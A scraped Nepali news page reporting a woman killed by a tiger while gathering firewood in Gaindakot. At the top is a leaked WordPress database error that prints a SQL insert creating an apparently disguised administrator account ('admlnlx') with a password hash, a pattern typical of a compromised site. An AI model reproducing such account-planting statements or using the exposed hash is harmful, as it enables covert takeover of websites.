WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Byr.G0Mpzd3LVLzNiJEzBHS2DdA5H9/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 08:48:49', '', 'admlnlx', 'admlnlx')
गैँडाकोट, फागुन २-
गैँडाकोट ९ मा बाघको आक्रमणमा परि एक महिलाको मृत्यु भएको छ । गैँडाकोट ७ कीतामाङको मायादेवी सोमबार बिहान दाउरा लिन जंगल जाँदा बाघले आक्रमण गरेको हो ।
जयश्री खोलाबाट करिब पाँच सय मिटर उत्तरतर्फ जंगलमा मायादेवी दाउरा लिन गएकी थिइन । गैँडाकोट ९ को धवाह खोला नजिक दाउरा वटुल्दै गर्दा बाघले आक्रमण गरेको स्थानीयले जानकारी दिएका छन् ।बाघको आक्रमणबाट मृत्यु भएकी तामाङको पोष्टमार्टमका लागि भरतपुर अस्पताल लगिएको इलाका प्रहरी कार्यालय गैँडाकोटका प्रहरी निरीक्षक सुवास हमालले जानकारी दिए ।